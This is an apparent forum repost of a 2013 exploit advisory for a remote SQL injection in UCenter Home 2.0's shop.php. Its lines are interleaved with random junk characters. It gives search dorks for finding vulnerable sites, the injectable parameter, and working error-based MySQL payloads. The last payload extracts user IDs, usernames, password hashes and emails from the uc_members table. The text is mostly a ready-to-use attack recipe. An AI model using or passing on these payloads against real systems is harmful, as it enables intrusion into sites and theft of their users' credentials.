1 `% z8 D6 m+ R- W/ `& H! Z2 f6 p
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ * S2 f/ N2 y2 C. Y
) k. y* _% C) @4 B z0 W' C+ z! N
3 {$ k4 ?) g n" R* p# n. N4 t
. P( w$ E8 A- D: d*/ Author : KnocKout
6 R9 R' B. F+ Z" B$ h8 X% ?6 ?6 T* r
# y1 p1 ?' ~. O*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers * G. x3 ]$ j7 x
3 b! O. y! H0 E! o
*/ Contact: knockoutr@msn.com
2 b4 o' R4 g" T9 w. @; {; U1 {$ b& D* ?$ l7 T( H
*/ Cyber-Warrior.org/CWKnocKout
4 F v" {5 {% g
# k2 A3 i* d0 I& e2 U' k) P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' f7 w+ u+ ?+ E0 k6 w' V t }" y* G1 q: L! t8 z. R$ k
Script : UCenter Home $ ~) w- }& w2 e
( y2 s N/ ~- {5 T9 f YVersion : 2.0 5 D H0 c. E$ ~, D+ L- n
: T8 ?) M2 x( q* u) K
Script HomePage : http://u.discuz.net/ 5 O6 h) ]6 k& l# _' ^' M
# z" y l8 }& y* R8 E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ) j2 u" j3 I$ C& G* J: `% D- [
. B) A$ |; G! qDork : Powered by UCenter inurl:shop.php?ac=view ( I' u6 e: q! U: g
2 D' o! |. P. n1 i( e- O
Dork 2 : inurl:shop.php?ac=view&shopid= * O" k' k- S9 Q: f; y$ A: w' l
. {+ ~, e2 T4 r/ X__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 9 W+ f, |& j& L; U- p( |( H
) j& o0 k# D# ~6 c/ kVuln file : Shop.php 8 Q3 }' `# x0 X+ U: {7 F [
) L* {7 f4 d9 q+ L' g
value's : (?)ac=view&shopid=
7 k( _; V9 s; ~1 v; }. Q7 N6 c; V! {4 [% W+ C: Y
Vulnerable Style : SQL Injection (MySQL Error Based) - y; V8 Z& q1 U/ o
; g$ M: d6 O3 n {, z1 d4 u
Need Metarials : Hex Conversion
( J4 b9 Q. w' }1 ] w
4 M1 @0 I- f8 t% P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # N* \" ~. |+ X3 \5 m' c
{/ N* V! f5 dYour Need victim Database name. 2 }! g: ^) M. }
' s" }. M! ^/ z7 s0 n b( r. X7 Y5 lfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 C. y U$ t |* Z; }+ G
9 I* ]" P' M$ J' n.. 6 V6 m( L% K- j- W8 q
3 g0 ^5 ~* r4 f, |/ ^# h" r
DB : Okey. , v2 j# d) x) ^
& u, |' T+ `0 R- z5 Ayour edit DB `[TARGET DB NAME]` j# B) i( m2 q
) A0 o: B7 L) o* v. O2 |, W) j
Example : 'hiwir1_ucenter' ) R% s3 j4 e$ m; M
# P3 x* W' f" z
Edit : Okey.
9 u' B1 w7 X& ]* a% K! N, c
; z8 v9 `7 I" M5 y+ t9 n5 m( jYour use Hex conversion. And edit Your SQL Injection Exploit.. 8 n7 z" U }# v/ Q+ `# W; N7 L% [/ ^
) `: }, Q8 E3 m
, f# Q" m6 Y/ N' P( I0 n, U- i4 _' l0 Y) K# g) Y* ^
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # m3 {! `- W, p9 f
|
发表于 2013-2-27 21:31:31
收藏
支持
反对